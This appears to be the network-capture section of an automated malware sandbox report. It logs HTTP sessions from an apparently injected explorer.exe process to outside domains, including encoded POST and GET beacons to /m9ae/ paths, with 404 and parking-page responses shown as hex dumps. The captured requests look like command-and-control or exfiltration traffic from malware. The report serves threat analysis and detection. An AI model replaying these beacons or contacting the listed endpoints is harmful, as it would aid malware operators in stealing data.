                                                                                                                        Data Ascii: <HTML><HEAD><title>404 Not Found - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><a href="https://mchost.ru/"><img src="/mclogo5536fc9343e9ab0aca071354084dd3cc.jpg" alt="" border="0"></a><br><br><H1>404 Not Found<br>C </H1><br> <a href="https://mchost.ru/"> </a></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that sh
                                                                                                                        Nov 29, 2022 10:35:56.932964087 CET307INData Raw: 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73
                                                                                                                        Data Ascii: ort error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        28192.168.2.54974462.233.121.6180C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:36:02.127837896 CET315OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.new-thinking.digital
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 410
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.new-thinking.digital
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.new-thinking.digital/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 28 63 75 41 4d 53 38 4d 28 2d 49 4d 62 5f 79 5a 4c 73 6a 31 46 55 49 4b 38 74 32 30 49 4a 6e 53 51 64 62 4d 54 62 36 51 4f 4d 4b 6c 50 48 65 76 35 4e 41 4c 61 36 50 42 59 30 74 38 57 71 6b 61 73 74 39 65 62 69 77 76 5a 54 66 45 63 4f 70 59 33 66 54 64 76 42 38 34 46 53 30 4b 7a 52 71 34 6c 32 7e 6e 68 46 45 51 45 45 4a 4a 4f 38 37 44 51 58 34 71 7a 30 50 39 35 41 6f 5a 55 56 33 5a 62 67 4e 77 36 33 58 4f 36 49 57 2d 6f 49 64 74 39 36 57 62 61 70 49 6e 79 57 30 74 71 45 46 7a 4c 4e 61 73 76 6a 76 76 62 79 61 79 71 35 38 78 36 78 30 6e 35 6a 34 61 32 72 67 78 38 6c 37 5f 55 45 7a 4d 5a 68 68 52 48 63 4a 78 7a 67 77 63 43 61 70 61 4f 37 59 58 43 4c 47 38 35 6f 38 6f 5a 70 66 53 67 79 48 36 36 48 76 32 67 4a 66 71 78 49 64 4c 31 52 5a 62 75 69 4f 35 7e 46 36 5f 64 36 44 45 53 72 39 54 78 32 41 72 63 4a 76 45 34 4f 79 45 42 65 74 42 32 4c 53 78 75 45 6b 66 30 6f 4f 31 54 4f 55 74 6c 5a 45 37 6d 70 39 6c 56 51 70 4a 64 70 46 49 58 53 68 48 49 67 28 36 6c 61 51 69 34 53 52 4f 38 55 64 36 38 63 32 78 33 70 72 47 4f 76 72 71 54 53 38 67 33 72 63 6e 76 31 7e 76 56 64 47 36 64 7a 44 63 7e 4a 45 74 71 55 54 44 56 71 4e 53 4a 74 77 2d 6c 61 44 79 69 76 68 32 67 64 6a 4a 6b 53 35 77 70 66 74 2d 6c 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=(cuAMS8M(-IMb_yZLsj1FUIK8t20IJnSQdbMTb6QOMKlPHev5NALa6PBY0t8Wqkast9ebiwvZTfEcOpY3fTdvB84FS0KzRq4l2~nhFEQEEJJO87DQX4qz0P95AoZUV3ZbgNw63XO6IW-oIdt96WbapInyW0tqEFzLNasvjvvbyayq58x6x0n5j4a2rgx8l7_UEzMZhhRHcJxzgwcCapaO7YXCLG85o8oZpfSgyH66Hv2gJfqxIdL1RZbuiO5~F6_d6DESr9Tx2ArcJvE4OyEBetB2LSxuEkf0oO1TOUtlZE7mp9lVQpJdpFIXShHIg(6laQi4SRO8Ud68c2x3prGOvrqTS8g3rcnv1~vVdG6dzDc~JEtqUTDVqNSJtw-laDyivh2gdjJkS5wpft-lQ).
                                                                                                                        Nov 29, 2022 10:36:02.163863897 CET317INHTTP/1.1 404 Not Found
                                                                                                                        Date: Tue, 29 Nov 2022 09:36:02 GMT
                                                                                                                        Server: Apache
                                                                                                                        Last-Modified: Thu, 29 Oct 2020 17:44:48 GMT
                                                                                                                        ETag: "82a1a-f65-5b2d2d61e36a7"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 3941
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 36 39 32 63 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 53 61 6e 73 20 55 6e 69 63 6f 64 65 22 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 47 61 72 75 64 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 09 09 09 61 20 7b 0d 0a 09 09 09 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 09 09 09 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 72 61 70 70 65 72 20 7b 0d 0a 09 09 09 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 30 30 70 78 3b 0d 0a 09 09 09 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 65 6d 3b 0d 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 09 09 09 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 09 09 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 72 61 70 70 65 72 20 2e 6c 6f 67 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:#f8692c; color: #fff; font-family: Arial, "Lucida Sans Unicode","Lucida Grande",Garuda,sans-serif; } body { overflow: hidden; } iframe { margin: 0 auto 0; }a { text-decoration: none;} .wrapper { max-width: 1100px; padding: 0 1em; margin: 0 auto; position: relative;} .wrapper .logo {
                                                                                                                        Nov 29, 2022 10:36:02.163906097 CET318INData Raw: 09 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0d 0a 09 09 09 7d 0d 0a 09 09 09 2e 77 72 61 70 70 65 72 20 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 77 69 64 74 68 3a 20 35 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: float: left;}.wrapper .logo img { width: 50vw; max-width: 240px; margin: 1em 0;}.wrapper .nav {text-align: right;display: inline;float: right;margin: 1.6em
                                                                                                                        Nov 29, 2022 10:36:02.163943052 CET319INData Raw: 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f
                                                                                                                        Data Ascii: t="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content
                                                                                                                        Nov 29, 2022 10:36:02.163975954 CET320INData Raw: 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'easyparkeddomains'


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        29192.168.2.54974562.233.121.6180C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:36:04.673228979 CET321OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.new-thinking.digital
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 186
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.new-thinking.digital
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.new-thinking.digital/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 28 63 75 41 4d 53 38 4d 28 2d 49 4d 62 4d 61 5a 4b 39 6a 31 52 6b 49 4b 33 4e 32 32 49 4a 6e 52 51 64 62 49 54 61 28 4c 62 72 75 6c 50 79 79 76 35 37 38 4c 57 61 50 41 51 55 74 34 4a 36 6b 50 73 74 39 34 62 69 4d 76 5a 58 33 45 63 4d 42 59 33 73 37 65 31 42 38 36 44 53 30 4a 33 52 72 69 6c 32 79 7a 68 45 6f 51 45 43 46 4a 50 4e 37 44 42 69 6b 70 67 45 50 38 6c 77 6f 53 65 31 33 64 62 67 4d 52 36 33 58 6b 36 4b 65 2d 72 34 4e 74 38 59 7e 55 4a 4a 49 6d 39 47 31 4e 74 6b 68 32 54 4f 6d 58 6c 57 75 32 48 32 76 45 67 64 74 61 69 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=(cuAMS8M(-IMbMaZK9j1RkIK3N22IJnRQdbITa(LbrulPyyv578LWaPAQUt4J6kPst94biMvZX3EcMBY3s7e1B86DS0J3Rril2yzhEoQECFJPN7DBikpgEP8lwoSe13dbgMR63Xk6Ke-r4Nt8Y~UJJIm9G1Ntkh2TOmXlWu2H2vEgdtaiw).
                                                                                                                        Nov 29, 2022 10:36:04.710150003 CET322INHTTP/1.1 404 Not Found
                                                                                                                        Date: Tue, 29 Nov 2022 09:36:04 GMT
                                                                                                                        Server: Apache
                                                                                                                        Last-Modified: Thu, 29 Oct 2020 17:44:48 GMT
                                                                                                                        ETag: "82a1a-f65-5b2d2d61e36a7"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 3941
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 36 39 32 63 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 53 61 6e 73 20 55 6e 69 63 6f 64 65 22 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 47 61 72 75 64 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 09 09 09 61 20 7b 0d 0a 09 09 09 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 09 09 09 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 72 61 70 70 65 72 20 7b 0d 0a 09 09 09 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 30 30 70 78 3b 0d 0a 09 09 09 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 65 6d 3b 0d 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 09 09 09 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 09 09 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 72 61 70 70 65 72 20 2e 6c 6f 67 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:#f8692c; color: #fff; font-family: Arial, "Lucida Sans Unicode","Lucida Grande",Garuda,sans-serif; } body { overflow: hidden; } iframe { margin: 0 auto 0; }a { text-decoration: none;} .wrapper { max-width: 1100px; padding: 0 1em; margin: 0 auto; position: relative;} .wrapper .logo {
                                                                                                                        Nov 29, 2022 10:36:04.710190058 CET323INData Raw: 09 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0d 0a 09 09 09 7d 0d 0a 09 09 09 2e 77 72 61 70 70 65 72 20 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 77 69 64 74 68 3a 20 35 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: float: left;}.wrapper .logo img { width: 50vw; max-width: 240px; margin: 1em 0;}.wrapper .nav {text-align: right;display: inline;float: right;margin: 1.6em
                                                                                                                        Nov 29, 2022 10:36:04.710221052 CET325INData Raw: 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f
                                                                                                                        Data Ascii: t="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content
                                                                                                                        Nov 29, 2022 10:36:04.710248947 CET325INData Raw: 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                        Data Ascii: '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'easyparkeddomains'


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        3192.168.2.549715192.185.90.10580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:34:37.474416971 CET208OUTGET /m9ae/?F6z4=mwF44ViOu9spAX9yiKWO/GCmf5D0pm7R930/p+8373gvxGpTfL4o/Lm9AHizqU6H72eF1eWgDLpzZ2SfuF6Kyw289k0D2VxhyA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1
                                                                                                                        Host: www.gmrsnodes.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 29, 2022 10:34:37.611229897 CET209INHTTP/1.1 404 Not Found
                                                                                                                        Date: Tue, 29 Nov 2022 09:34:37 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2,h2c
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Sun, 02 Oct 2022 12:42:28 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 11816
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Content-Type: text/html
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 67 61 74 6f 72 62 6f 74 74 6f 6d 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6c 65 66 74 3a 33 39 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 78 78 78 7b
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 - PAGE NOT FOUND</title>... Add Slide Outs --><script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> <script src="/cgi-sys/js/simple-expand.min.js"></script> <style type="text/css"> body{padding:0;margin:0;font-family:helvetica;} #container{margin:20px auto;width:868px;} #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;} #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;} #container #mid404 #gatorbottom{position:relative;left:39px;float:left;} #container #mid404 #xxx{
                                                                                                                        Nov 29, 2022 10:34:37.611268044 CET211INData Raw: 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 20 33 39 37 70 78 20 31 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 20 61 75 74 6f 20 2d 31 30 70 78 20 61 75 74 6f 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e
                                                                                                                        Data Ascii: float:left;padding:40px 397px 10px; margin: auto auto -10px auto} #container #mid404 #content{float:left;text-align:center;width:868px;} #container #mid404 #content #errorcode{font-size:30px;font-weight:800;} #container
